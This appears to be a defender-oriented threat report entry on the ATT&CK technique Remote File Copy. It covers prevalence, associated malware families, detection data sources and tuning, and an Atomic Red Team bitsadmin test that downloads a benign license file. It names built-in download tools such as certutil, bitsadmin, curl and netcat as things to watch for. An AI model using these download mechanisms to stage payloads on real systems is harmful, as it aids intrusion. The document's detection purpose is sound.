Technique T1105

Remote File Copy

Remote File Copy is fundamentally similar to Windows Admin Shares, and so the popularity of the ETERNALBLUE exploit among adversaries probably plays a substantial role in its prominence.

#5

Overall rank

29%

Organizations affected

1393

Confirmed threats

Analysis

Climbing from 19th in 2018 to fifth in 2019, Remote File Copy saw substantial upticks in both percentage of total threat volume and in the number of customers affected.

Why do adversaries use Remote File Copy?

Living-off-the-land techniques are popular because many of the tools that an adversary might need to conduct a successful attack are installed on machines by default. However, not all exploitation tools exist natively on all systems. Adversaries leverage the Remote File Copy technique to deploy binaries from a command and control (C2) server to a victim machine or between systems in a compromised environment. As these examples suggest, the technique falls under both the Command and Control and Lateral Movement tactics.

Like certain other techniques on this list, Remote File Copy is a technique of necessity. Adversaries often have to copy files between remote systems if they want to accomplish their objectives. As a result, we see many prominent malware families leveraging Remote File Copy. MITRE ATT&CK lists nearly 200 threat groups and malware samples, but some prominent examples include:

  • Astaroth
  • Bundlore
  • Dyre
  • Emotet
  • njRAT
  • PlugX
  • Shlayer
  • SmokeLoader
  • TrickBot
  • Wannacry

How do adversaries use Remote File Copy?

While there are many broad and specific adversarial use cases for it, much of the Remote File Copy activity we observe relates to server message block (SMB) scanning and Lateral Movement.

Some other behaviors that are commonly associated with Remote File Copy include:

  • Downloading binaries over HTTP/HTTPS
  • Downloading binaries using built-in operating system tools such as PowerShell, certutil.exe, wget/curl, and BITS/bitsadmin, among others

Emerging tactics

Threats may rely on download cradles that are not new but are less prevalent—such as a Python urllib download—to perform Remote File Copy.

Sighted with

Remote File Copy occurs in tandem with many other techniques, most frequently with Windows Admin Shares (T1077). BITS Jobs (T1197) is another technique that is conceptually similar and frequently occurs in tandem with Remote File Copy. Exfiltration Over Alternative Protocol (T1048) and Data Staged (T1074) are additional techniques that frequently show up with Remote File Copy, suggesting that the technique occasionally plays a role in exfiltration.

We also observe a high volume of detections where Remote File Copy occurs with Process Injection (T1055) and a smaller volume occurring with Disabling Security Tools (T1089), both likely due to TrickBot. Some other interesting associations include DLL Search Order Hijacking (T1038), Domain Trust Discovery (T1482), and Process Hollowing (T1093).

Definition

Detection

MITRE’s data sources

  • File monitoring
  • Packet capture
  • Process use of network
  • Netflow/Enclave netflow
  • Network protocol analysis
  • Process monitoring

Collection requirements

In addition to those data sources listed by MITRE ATT&CK, security teams should consider collecting from the following log sources:

  • Firewall logs
  • Database logs
  • Email logs

Netflow/Enclave netflow and network protocol analysis

Network protocol analysis and/or Netflow will have the best chance to detect remote file transfers because, by definition, a Remote File Copy will have to traverse the network.

Process monitoring

Process monitoring serves as an excellent supplement to network-based monitoring. Since it’s host based, this data source isn’t as easily affected by the evasion techniques that adversaries often use to subvert network-based security technologies, such as encryption or the misuse of network protocols.

Detection Suggestions

You’ll want to establish a baseline for expected network activity and then alert on unusual network usage based on the following:

  • Destination-source objects
  • Data volume
  • Protocol
  • Other network traffic characteristics

This has been particularly effective in detecting data exfiltration. As an example, Red Canary had detected more than 1,000 confirmed threats this year based on detection and analysis of an excessive number of SMB sessions.

In terms of process data, there are a number of operating system-level commands that are capable of—but unusual mechanisms for—file transfer. Some examples include the use of:

  • Python web server and curl
  • Netcat
  • OpenSSL for encrypted file transfers

Examining telemetry for these unusual events can be an effective way to detect malicious Remote File Copies. That said, most adversaries will only resort to using these unusual mechanisms for file transfer if more typical ones—such as file transfer protocol (FTP and secure copy (SCP), for example—are not available.

In addition, any non-native applications that establish network connections should be viewed with suspicion. The nearly 200 threats that MITRE ATT&CK lists for this technique include numerous examples that may be detectable in this way.

Weeding out false positives

False positive rates for detecting malicious Remote File Copying will vary widely from one environment to the next. For example, a public FTP server might generate an excessive number of alerts for suspicious FTP connections, so analytics based on any data source will need to be tuned for the environment in which they’re deployed. In some environments, connections to network printers may skew the expected network connections for system processes such as Notepad.

The two data sources suggested above (network and process data) probably have the greatest capacity to generate false positives if you fail to tune them. In general, process data is easier to tune, since it tends to include more context (e.g., user context, frequency analysis, and process ancestry) that can be used to determine behavior and intent.

Testing

Getting Started With Atomic Red Team

Start testing your defenses against Remote File Copy using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View Atomic tests for T1105: Remote File Copy. In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using Command Prompt:
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
Useful telemetry will include:
Data SourceTelemetry
Data Source:

Process monitoring

Telemetry:

bitsadmin.exe

Data Source:

Process command line

Telemetry:

“/transfer qcxjb7”, and the presence of a URL

Data Source:

File monitoring

Telemetry:

creation of “Atomic-license.txt”

Data Source:

Network connection

Telemetry:

to remote site: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.

Del Armstrong
Detection engineer
The detection strategies in this section were brought to you by Del Armstrong! Del has an extensive history working in IT, including 15 years focused on computer security. He has a master’s in computer science and expertise in Linux/Unix, SOC team training, and various programming languages.
The detection strategies in this section were brought to you by Del Armstrong! Del has an extensive history working in IT, including 15 years focused on computer security. He has a master’s in computer science and expertise in Linux/Unix, SOC team training, and various programming languages.